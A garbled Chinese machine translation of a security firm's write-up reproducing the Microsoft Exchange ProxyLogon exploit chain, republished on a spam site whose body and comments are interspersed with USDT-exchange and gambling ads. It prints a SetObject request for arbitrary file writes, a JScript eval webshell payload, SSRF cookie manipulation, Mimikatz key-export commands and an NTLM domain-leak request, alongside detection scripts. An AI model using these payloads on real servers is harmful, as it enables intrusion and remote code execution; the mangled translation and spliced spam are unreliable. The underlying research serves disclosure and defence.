USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

0x00 简介

在最近的几周中,Microsoft检测到有攻击者在全球局限内行使多个0-Day破绽针对Microsoft Exchange Server的内陆版本发动攻击。其中的CVE-2021-26855破绽又被称为ProxyLogon,这是Microsoft Exchange Server上存在的一个破绽,可以导致攻击者绕过身份验证模拟用户操作。在我们考察到的攻击中,威胁行为者行使这个破绽接见了内陆Exchange服务器,从而获得了电子邮件帐户的接见权限,后续还安装了其他恶意软件以确保对受害者环境的耐久接见。

Praetorian Labs团队凭证最初的平安通告和补丁剖析睁开了逆向工程,并乐成开发出完整功效的端到端破绽行使。这篇文章概述了我们的破绽行使复现历程,其中隐去了要害的观点验证组件,以防止有攻击者凭证这篇文章来举行破绽武器化行使。只管我们没有公布完整的破绽行使代码,然则可以展望的是,平安社区很快就会有人公布完整的破绽行使程序。在这部门内容被果然之后,我们也会随即讨论更为详细的端到端解决方案。我们信托在未完整果然的这段时间,可以让企业有更多时间来修复这一严重破绽。

Microsoft已经迅速开发并公布了剧本、威胁指标和紧要修复补丁,以辅助缓解这些破绽。Microsoft平安响应中央此前已经公布过一篇文章,其中详细说明晰这些缓解措施。值得注重的是,URL重写模块可以乐成地阻止破绽行使,而无需再举行分外的紧要修复,可以以为是针对ProxyLogon最迅速有用的对策。然则,攻击者对Proxylogon破绽的行使已经异常普遍,因此露出在公网的Exchange服务器的运营职员必须立刻开展应急响应和修复。

0x01 方式论

在举行逆向工程的历程中,我们根据以下步骤举行,以便可以对Exchange及其平安修补程序举行静态和动态修复。

1、差异:查看存在破绽版本与修复版本之间的差异。

2、测试:部署存在破绽版本的完整测试环境。

3、考察:部署工具,考察通例情形下的网络通讯情形。

4、剖析:逐一剖析每个CVE破绽,将补丁差异与网络流量相关联,组织观点验证PoC破绽。

0x02 补丁差异

通过检查更新补丁前后的二进制文件之间的差异,我们可以准确定位到举行了哪些更改。随后,对这些更改部门举行逆向工程,从而复现原始破绽。

Microsoft的Update Catalog对于我们获取补丁并举行差异对照的事情来说很有辅助。只需搜索相关软件版本,网站就会返回一个平安补丁的汇总列表,我们可以凭证这个列表上的平安补丁举行对比剖析。例如,搜索“Exchange Server 2013 CU23的平安更新”,就可以找到特定版本的Exchange修复程序。之以是我们选择Exchange 2013,是由于该版本受到CVE-2021-26855破绽影响,且补丁包最小,因此我们通过这个补丁包来举行差异剖析。

Microsoft Update Catalog支持根据日期排序,我们所需的是前两个补丁文件。

首先,我们下载了最新的(2021年3月2日)平安更新汇总和以前(2021年2月12日)的平安更新汇总。从.cab文件中提取出.msp文件,并使用7Zip解压缩.msp文件,就获得了两个需要对照的二进制文件夹。

.msp更新中包罗数百个二进制文件,其中大多数是.NET应用程序:

由于大多数二进制文件都是.NET应用程序,因此我们使用dnSpy将每个二进制文件反编译为一系列源文件。为了加速剖析速率,我们使用自动化反编译,并行使源代码治理的对照功效,将每个版本作为单独的提交上传到GitHub Repo举行对照。

借助GitHub可以清晰区分出要害差异:

我们发现另一个可以用于对比差异的工具是Telerik的JustAssembly。若是要考察现实的文件差异,该工具的运行速率稍慢,但有助于确定那里添加或删除了代码。

JustAssembly精练地显示出整个DLL的更改:

在准备事情完成后,我们需要启动目的Exchange服务器,以最先测试。

0x03 测试

首先,我们使用Microsoft的ADDSDeployment模块来设置尺度域控。随后,下载相关的Exchange安装程序(例如Exchange 2013 CU23)并执行了尺度安装历程。

针对基于Azure的Exchange环境,我们根据这里概述的步骤举行操作,将其中第8步“Install Exchange”下载的安装程序替换为准确的Exchange安装程序链接。此外,我们修改了服务器设置剧本中的PowerShell代码片断,以启动2012-R2 Datacenter服务器,而非2019 Server版本。

$vm=Set-AZVMSourceImage -VM $vm -PublisherName MicrosoftWindowsServer -Offer `
WindowsServer -Skus 2012-R2-Datacenter -Version "latest"

这将允许我们快速部署自力的域控制器和Exchange服务器,并确立适当的网络平安组,以防止不需要的互联网破绽行使实验。

0x04 考察

Microsoft Exchange由几个后端组件组成,这些后端组件在服务器正常运行时代相互通讯。从用户的角度来看,对前端Exchange服务器的请求将通过IIS流到Exchange HTTP署理,Exchange HTTP署理卖力评估邮箱路由逻辑,并将请求转发到响应的后端服务器。这一历程如下图所示。

Microsoft Exchange 2016客户端接见协议系统结构图:

我们重点考察从HTTP署剃头送到Exchange后端的所有流量,由于其中应该包罗来自真实服务的许多示例请求,这样一来我们就可以更好地明晰源代码和破绽行使程序中的请求。

Exchange已经部署在IIS上,因此我们对Exchange后端绑定举行了简朴的更改,将端口由444调换为4444。接下来,我们在444端口上部署了署理,以将数据包转发到新的绑定地址。

Exchange HTTP代剖析验证Exchange后端的TLS证书,为了使我们的署理有用,我们想从测试盘算机的内陆证书存储中将“Microsoft Exchange”证书转储出来。由于这个证书的私钥在Exchange安装历程中被符号为不能导出,因此我们使用Mimikatz提取了密钥和证书。

mimikatz, privilege::debug
mimikatz, crypto::certificates /export /systemstore:LOCAL_MACHINE

使用Mimikatz从测试机中提取Exchange证书和密钥:

有了证书和密钥后,我们依附socat(一个多功效网络中继工具)这样的工具,使用Exchange证书侦听444端口,并将毗邻转发到4444端口(现实的Exchange后端)。socat下令可能如下所示:

, export the certificate and private key (password mimikatz)
openssl pkcs12 -in 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_Microsoft Exchange.pfx' -nokeys -out exchange.pem
openssl pkcs12 -in 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_Microsoft Exchange.pfx' -nocerts -out exchange.pem
, launch socat, listening on port 444, forwarding to port 4444
socat -x -v openssl-listen:4444,cert=exchange.pem,key=exchange-key.pem,verify=0,reuseaddr,fork openssl-connect:127.0.0.1:444,verify=0

在设置了署理后,我们就可以正常使用Exchange天生HTTP请求,从而剖析内部毗邻的详细信息。此外,几个后端服务器历程会将请求发送到444端口,从而让我们能够考察到定期运行状态检查、Powershell远程处置请求等。

0x05 剖析

只管每个CVE破绽都不相同,但我们对其中每一个CVE破绽举行剖析的方式通常包罗五个阶段:

1、检查指标;

2、检查补丁差异;

3、将指标与差异举行对应;

4、将这些代码路径毗邻到署理流量;

5、组织请求以触发这些代码路径;

6、重复上述步骤。

5.1 从CVE-2021-26857最先热身

凭证Microsoft关于HAFNIUM破绽的通告,“CVE-2021-26857是统一新闻服务(Unified Messaging Service)中不平安的反序列化破绽。其中,不平安的反序列化是指不能信的用户控制数据被程序反序列化的位置。行使这一HAFNIUM破绽,可以在Exchange服务器上以SYSTEM身份执行代码。”

只管最终纷歧定要行使这一破绽在Exchange服务器上实现远程代码执行,但它提供了一个简朴的示例,说明若何凭证补丁差异对比来展现破绽的细节。凭证上面的通告,我们可以明确地将统一新闻服务确定为潜在目的,这极大地辅助了我们缩小初始搜索空间。

Exchange二进制软件包的命名异常清晰,署理功效位于Microsoft.Exchange.HttpProxy.*中,日志上传位于Microsoft.Exchange.LogUploader中,而统一新闻代码位于Microsoft.Exchange.UM.*中。在对照文件时,并不能一直依赖文件名给出的提醒线索,但若是文件名中包罗了一些提醒信息,我们也不要忽略它。

这些DLL的JustAssembly差异异常清晰地展现了破绽的基本缘故原由:

凭证存在差异的类,注释已经删除了Base64Deserialize函数,而且添加了contactInfoDeserializationAllowList属性。.NET从历史上就一直在解决反序列化问题,因此,看到这样的调换很可能注释它删除了存在破绽的代码,而且增添针对.NET反序列化破绽行使的防护。在我们检查Base64Deserialize之后可以证实这一点。

删除的函数将Base64字符串的输出值通报给BinaryFormatter的反序列化:

在修复之前,我们通过对比差异发现,从Microsoft.Exchange.UM.UMCore.PipelineContext.FromHeaderFile挪用了这个不平安的方式。

序列化的PipelineContext的ContactInfo属性可用于触发破绽:

这个函数的修复后版本中包罗更多代码,可以在反序列化之前准确验证其类型。

本质上,这个修复程序删除了存在.NET反序列化破绽的函数,该破绽可以使用ysoserial.net之类的工具轻松行使。只管这里的攻击路径异常简朴,但服务器并不是始终启用统一新闻功效你的,因此,我们的观点验证破绽行使要依赖于下面所剖析的CVE-2021-27065破绽。

5.2 服务器端请求伪造(CVE-2021-26855)

由于所有远程代码执行破绽都需要绕过身份验证,因此我们将注重力转向了服务器端请求伪造破绽(SSRF)。Microsoft公布了以下PowerShell下令,以搜索与这一破绽相关的指标:

Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName `
| Where-Object {  $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | select DateTime, AnchorMailbox

此外,Volexity还公布了以下与SSRF破绽行使相关的URL:

/owa/auth/Current/themes/resources/logon.css
/owa/auth/Current/themes/resources/...
/ecp/default.flt
/ecp/main.css
/ecp/.js

行使这些指示符,我们在补丁差异中寻找了相关的要害词(包罗主机、主机名、fqdn等字符串),最终在Microsoft.Exchange.FrontEndHttpProxy.HttpProxy中发现了值得关注的调换。与此同时,我们还发现了BEResourceRequestHandler使用的BackEndServer类中的差异。

与ServerInfo / authentication / host / fqdn相关的补丁差异:

BEResourceRequestHandler使用的BackEndServer类的补丁差异:

接下来,我们追踪对BEResourceRequestHandler的挪用,从ProxyModule中的SelectHandlerForUnauthenticatedRequest方式中找到了相关的路径。

下图的简化代码展示了掷中BEResourceRequestHandler的路径:

最后,我们评估了BEResourceRequestHandler的CanHandle方式,发现其中需要一个带有ECP“协议”的URL(例如:/ecp/)、一个X-BEResource Cookie和一个以静态文件类型扩展名末端的URL(例如js、css、flt等)。由于这段代码是在HttpProxy中实现的,因此这个URL纷歧定需要有用,这也说明晰一个事实,即我们可以使用/ecp/y.js(一个不存在的文件)作为指示符。

,

USDT跑分网

U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

X-BEResource Cookie在BackEndServer.FromString中举行剖析,其凭证“~”来拆分字符串,将第一个元素分配给后端的“fqdn”,将第二个元素剖析为整数的版本号。
随后,我们追踪了这个BackEndServer工具的用法,发现它在ProxyRequestHandler中用于确定要将署理请求发送到的Host。URI是通过UriBuilder在GetTargetBackEndServerUrl中组织的,而UriBuilder是内陆.NET类。

下图的简化代码展示了ProxyRequestHandler中的相关方式:

在这里,从理论上来说,我们可以通过设置特定的标头,并将请求发送到/ecp中的“静态”文件来控制这些用于后端毗邻的Host。然则,仅控制这些主机并不足以让我们在Exchange后端上挪用随便终端。为此,我们查看了.NET源代码自己,以领会UriBuilder是若何实现的。

UriBuilder源代码中的ToString方式:

如上面的代码片断所示,UriBuilder的ToString方式(用于组织URI)仅将我们输入的内容举行简朴的字符串毗邻。因此,若是将Host设置为“example.org/api/endpoint/,”,就可以有用获得对目的URL的完全控制。

有了这些信息,我们就可以通过下述HTTP请求实验举行SSRF行使。

由于Kerberos主机不匹配,因此SSRF实验接见example.org失败:

由于与example.org通讯的NegotiateSecurityContext错误,我们此次SSRF实验遇到了失败。事实证实,这次失败辅助我们明晰了SSRF,由于它注释HTTP署理是图通过Kerberos向后端服务器举行身份验证的事实。随后,将主机名设置为Exchange服务器的盘算机名,就会发现Kerberos身份验证乐成。而且我们现在可以以NT AUTHORITY\SYSTEM身份接见终端。至此,我们组织了以下HTTP请求来举行SSRF破绽行使。

由于后端身份验证检查,这次SSRF实验同样失败:

又一次,后端服务器由于某种缘故原由拒绝了我们的请求。通过跟踪这一错误,我们最终发现了EcpProxyRequestHandler.AddDownLevelProxyHeaders方式,该方式仅在ProxyToDownLevel设置为true时才会挪用。这一方式会检查用户是否已经通过身份验证,若是没有通过验证,则会返回HTTP 401错误。

幸运的是,我们可以通过修改Cookie中的服务器版原本阻止GetTargetBackEndServerUrl设置这个值。若是版本大于Server.E15MinVersion,那么ProxyToDownLevel将保持为false。在举行这个更改之后,我们乐成通过了后端服务(autodiscover)的身份验证。

乐成实现autodiscover终端的SSRF行使:

在查看上述代码路径时,我们在OWA署理处置程序中发现了另一处SSRF。这些请求是在没有经由Kerberos身份验证的情形下发送的,因此可以将其定向到随便服务器,如下所示。

通过X-AnonResource Cookie乐成实现到example.org的SSRF实验:

至此,我们就有能力来伪造对某些后端服务的请求。现在我们暂时不会公布有关若何通过敏感服务认证(例如/ecp)的细节,由于这些信息尚未被果然披露。

5.3 随便文件写入(CVE-2021-27065)

在获得了SSRF之后,我们将注重力转向了远程代码执行。在最先剖析补丁差异之前,关于这个破绽的第一个线索来自于Microsoft和Volexity公布的指标。他们示意,通过下述PowerShell下令可以在ECP日志中搜索是否遭遇破绽行使攻击的指标:

Select-String -Path "$env:PROGRAMFILES\Microsoft\ExchangeServer\V15\Logging\ECP\Server\*.log" `
-Pattern 'Set-.+VirtualDirectory'

此外,Volexity的文章称对/ecp/DDI/DDIService.svc/SetObject 的请求与破绽行使相关。在掌握了上面两个信息之后,我们就在补丁差异中搜索了ECP或DDI类中与文件I/O相关的任何内容。很快就发现了Microsoft.Exchange.Management.ControlPanel.DIService中的WriteFileActivity类。“控制面板”(control panel)是ECP面向用户的名称,而DDIService直接位于指标URL之中。如下图中所体现的差异,旧版本会将由用户控制名称的文件直接写入到磁盘。而新版本的代码会在文件名后附加“.txt”扩展名(若是不存在该扩展名)。我们知道,在通常的破绽行使历程中,在将ASPX Webshell写入服务器时,通常都市优先选择WriteFileActivity来行使。

WriteFileActivity.cs在修复前后的差异:

我们在Exchange安装目录中搜索WriteFileActivity,可以在Exchange Server\V15\ClientAccess\ecp\DDI的多个XAML文件中看到它的存在。

ResetOABVirtualDirectory.xaml中的代码段:

在检查了XAML文件并查看了Exchange Web UI中的ECP功效后,我们确定上述SetObjectWorkflow形貌了需要在服务器端执行的一系列步骤(包罗Powershell cmdlet执行),从而可以执行特定操作。

ECP用户界面,展示了ResetVirtualDirectory的设置选项:

通过提交示例ResetVirtualDirectory请求,我们考察到Exchange服务器将VirtualDirectory的设置写入到指定路径,删除VirtualDirectory,然后重新确立。这个设置文件中包罗目录的多个属性,而且可以使用随便扩展名写入系统上的任何目录。请求和效果文件如下图所示。

向DDIService发送HTTP请求,以重置OAB VirtualDirectory:

POST /ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary={csrf} HTTP/1.1
Host: localhost
Cookie: msExchEcpCanary={csrf};
Content-Type: application/json
{
  "identity": {
    "__type": "Identity:ECP",
    "DisplayName": "OAB (Default Web Site)",
    "RawIdentity": "cf64594f-d739-44a4-aa70-3fbd158625e2"
  },
  "properties": {
    "Parameters": {
      "__type": "JsonDictionaryOfanyType:,Microsoft.Exchange.Management.ControlPanel",
      "FilePathName": "C:\\VirtualDirectory.aspx"
    }
  }
}

DDIService导出的文件显示了VirtualDirectory的所有属性:

ECP Web UI显示了VirtualDirectory的可编辑参数:

在UI中,果然了以下参数,可以用于编辑VirtualDirectory。值得注重的是,UI中果然的同时包罗内部URL和外部URL,在XAML中作为参数,并写入到我们的随便路径的文件之中。上述条件的组合,就可以使攻击者控制的输入内容到达随便路径,这也是我们行使Webshell所必须的原语。

经由一些实验后,我们能够确定内部和外部URL字段中的一部门会被服务器验证。也就是说,服务器将验证URI方案、主机名,以及不跨越256个字节的长度。此外,服务器会对Payload中的任何%符号举行编码(也就是将“%”变为“%25”)。这就会导致类似于 < %code% > 这样的通例ASPX代码块被转换为 < %25 code%25 > 的无效代码。然则,在这里并没有对其他元字符(例如“ < ”和“ > ”)举行编码,这就允许攻击者注入以下的URL:

http://o/,  < script language="JScript" runat="server" > function Page_Load(){eval(Request["mlwqloai"],"unsafe");} < /script >

在重置VirtualDirectory后,这个URL会被嵌入到导出中,并保留到我们指定的路径,从而可以在Exchange服务器上执行远程代码。

行使Webshell在被攻击的Exchange服务器上执行下令:

5.4 泄露后端和域

要形成完整的破绽行使链,需要Exchange服务器的后端和域。在Crowdstrike的一篇文章中,他们提供了攻击历程的完整日志,其中纪录了来自互联网的攻击细节。在日志中,首先是针对/rpc/终端的挪用。

初始请求是针对Exchange果然的/rpc/:

这个初始请求必须是未经身份验证状态下的,可能行使了HTTP上的RPC,它本质上通过终端果然了NTLM身份验证。 HTTP上的RPC是一个相当庞大的协议,我们可以凭证Microsoft提供的规范说明领会其详细信息。

站在攻击者的视角,我们关注剖析发送NTLM Negotiation新闻后返回给我们的NTLM Challenge新闻。在Challenge新闻中包罗许多AV_PAIR结构,其中包罗我们关注的信息,稀奇是MsvAvDnsComputerName(后端服务器名称)和MsvAvDnsTreeName(域名)。

Impacket的http.py中已经包罗执行协商(Negotiation)历程的代码,以天生Negotiation新闻,然后将Challenge响应剖析为AV_PAIR结构。请求和响应划分如下:

RPC_IN_DATA /rpc/rpcproxy.dll HTTP/1.1
Host: frontend.exchange.contoso.com
User-Agent: MSRPC
Accept: application/rpc
Accept-Encoding: gzip, deflate
Authorization: NTLM TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA=
Content-Length: 0
Connection: close
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/8.5
request-id: 72dce261-682e-4204-a15a-8055c0fd93d9
Set-Cookie: ClientId=IRIFSCHPJ0YLFULO9MA; expires=Tue, 08-Mar-2022 22:48:47 GMT; path=/; HttpOnly
WWW-Authenticate: NTLM TlRMTVNTUAACAAAACAAIADgAAAAFAomiVN9+140SRjMAAAAAAAAAAJ4AngBAAAAABgOAJQAAAA9DAE8AUgBQAAIACABDAE8AUgBQAAEACABlAHgAVgBNAAQAIABjAG8AcgBwAC4AYwBvAG4AdABvAHMAbwAuAGMAbwBtAAMAKgBlAHgAVgBNAC4AYwBvAHIAcAAuAGMAbwBuAHQAbwBzAG8ALgBjAG8AbQAFACAAYwBvAHIAcAAuAGMAbwBuAHQAbwBzAG8ALgBjAG8AbQAHAAgA8EkBM20U1wEAAAAA
WWW-Authenticate: Negotiate
WWW-Authenticate: Basic realm="frontend.exchange.contoso.com"
X-Powered-By: ASP.NET
X-FEServer: frontend
Date: Mon, 08 Mar 2021 22:48:47 GMT
Connection: close
Content-Length: 0

可以使用Impacket剖析Base64编码的哈希值,从而查看泄露的域信息。

在WWW-Authenticate NTLM Challenge中包罗的域信息:

恢复后的AV_PAIR数据被编码为Windows Unicode,并将特定的AV_ID映射到一个值。AV_ID是用于代表特定内容的常量,举例来说,我们想要获取的是AV_ID为3(后端主机名)和5(域)的字符串。

AV_PAIR结构与数据的对应关系:

凭证这里的信息,我们可以确定后端值为ex.corp.contoso.co,域为corp.contoso.com。这些也就是我们前面所讨论的SSRF破绽行使所需的值。

5.5 后续事情

如上文所述,我们在这里省略了某些破绽行使细节,以防止非法攻击者实现破绽行使。攻击者可以行使这一破绽以随便用户的身份向ECP终端举行身份验证,而这一历程我们交给读者去自行实验。在经由足够长的时间之后,我们将在后续的文章中披露更多详细信息。

0x06 检测方式

Microsoft的威胁情报中央(MSTIC)已经提供了异常详尽的指标和检测剧本,我们建议任何使用了Exchange服务器的用户都需要举行自查。为了确认是否存在可疑攻击,我们建议平安运营中央(SOC)、平安托管服务提供商(MSSP)、可治理的威胁检测与响应服务(MDR)接纳以下步骤:

1、确保所有终端防护产物已经更新并正常运行。只管检测引擎并没有针对这个破绽行使增添太多的威胁指标,但这些最新的工具可以轻松检测到破绽行使后的流动。

2、在所有Exchange服务器上,运行Microsoft GitHub中的TestProxyLogon.ps1剧本。凭证我们针对破绽行使实现武器化的履历,这个剧本应该可以检测露马脚行使的痕迹。

3、仔细检查服务器的设置、设计义务、自动运行等位置。这些都是攻击者在获取初始接见权限后可能会改动的位置。确保Exchange服务器启用了“Audit Process Creation”(审计历程确立)审核计谋和PowerShell日志纪录,并检查可疑的下令和剧本。若是发现可疑情形,应当尽快验证、讲述息争救。

随着我们后续对破绽行使的深入研究,我们还将公布其他信息,以辅助人人更好地检测环境中是否存在破绽行使的迹象。

6.1 后破绽行使

Sean Metcalf和Trimarc Security在先前的文章中详细先容了Exchange安装时通常启用的高级权限。根据这种方式举行设置后,一旦攻击者控制了Exchange服务器,便可以行使这一接见权限对整个域局限内开展进一步攻击。针对已经遭受攻击的环境,应当检查域工具的ACL,并确认受到攻击的Exchange资源所属的组,从而判断可能受到进一步攻击的局限。我们将Trimarc文章的PowerShell举行了修改,从而可以加倍详细地筛选Exchange Windows权限和Exchange受信托子系统组。若是您的环境中已经将Exchange资源添加到自界说组,或者自界说了其他组,则需要再对这个剧本举行响应调整。

import-module ActiveDirectory
$ADDomain = ''
$DomainTopLevelObjectDN = (Get-ADDomain $ADDomain).DistinguishedName
Get-ADObject -Identity $DomainTopLevelObjectDN -Properties * | select -ExpandProperty nTSecurityDescriptor | select -ExpandProperty Access | select IdentityReference,ActiveDirectoryRights,AccessControlType,IsInherited | Where-Object {($_.IdentityReference -like "*Exchange Windows Permissions*") -or ($_.IdentityReference -like "*Exchange Trusted Subsystem*")} | Where-Object {($_.ActiveDirectoryRights -like "*GenericAll*") -or ($_.ActiveDirectoryRights -like "*WriteDacl*")}

0x07 致谢

我们的破绽行使复现历程参考了此前许多研究职员、应急响应职员和其他致力于复现破绽的平安研究职员已揭晓的功效,需要对以下小我私人和团队示意谢谢:

DEVCORE - 最早发现了这一破绽

Volexity - 发现野外破绽行使

@80vul - 第一个复现破绽行使链的研究职员

Rich Warren(@buffaloverflow) - 在研究历程中与我们努力相助

Crowdstrike - 公布了有关野外破绽行使的更多信息

Microsoft - 迅速公布了威胁指标和补丁

本文翻译自:https://www.praetorian.com/blog/reproducing-proxylogon-exploit/: Allbet Gaming声明:该文看法仅代表作者自己,与本平台无关。转载请注明:usdt官方交易所(www.payusdt.vip):详细复现Microsoft Exchange Proxylogon破绽行使链(CVE-2021-26855)
发布评论

分享到:

filecoin矿机(www.flacoin.vip):《金融》信用卡3月签帐金额双升写同期高 Q1恢复生长
8 条回复
  1. www.6allbet.com
    www.6allbet.com
    (2021-04-29 00:05:05) 1#


    USDT第三方支付
    感觉入戏了

    1. ug环球360(www.ugbet.us)
      ug环球360(www.ugbet.us)
      (2021-05-27 08:36:21)     

      澳洲幸运5www.a55555.net)是澳洲幸运5彩票官方网站,开放澳洲幸运5彩票会员开户、澳洲幸运5彩票代理开户、澳洲幸运5彩票线上投注、澳洲幸运5实时开奖等服务的平台。
      很给力的感觉

  2. 皇冠体育APP
    皇冠体育APP
    (2021-07-12 00:05:37) 2#

    会不断进步的

  3. 皇冠新现金网平台
    皇冠新现金网平台
    (2021-07-27 00:12:01) 3#

    新2手机管理端网址www.22223388.com)实时更新发布最新最快最有效的新2手机管理端网址,包括新2手机网址,新2备用网址,皇冠最新网址,新2足球网址,新2网址大全。

    就是很好,谁损也没用

  4. 新2最新网址
    新2最新网址
    (2021-08-02 00:04:26) 4#

    U交所(www.usdt8.vip),全球頂尖的USDT場外擔保交易平臺。现已加入我的最爱

  5. 新2最新网址
    新2最新网址
    (2021-08-15 00:00:31) 5#

    我觉得主角好像我

  6. 新2代理手机端
    新2代理手机端
    (2021-08-31 00:03:52) 6#

    www.22223388.com)实时更新发布最新最快最有效的手机新2管理端网址,包括新2手机网址,新2备用网址,皇冠最新网址,新2足球网址,新2网址大全。我是铁粉,可以提问我

  7. 新2手机网址
    新2手机网址
    (2021-09-09 00:03:58) 7#

    USDT跑分网www.usdt8.vip),全球頂尖的USDT場外擔保交易平臺

    魅力无限啊

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。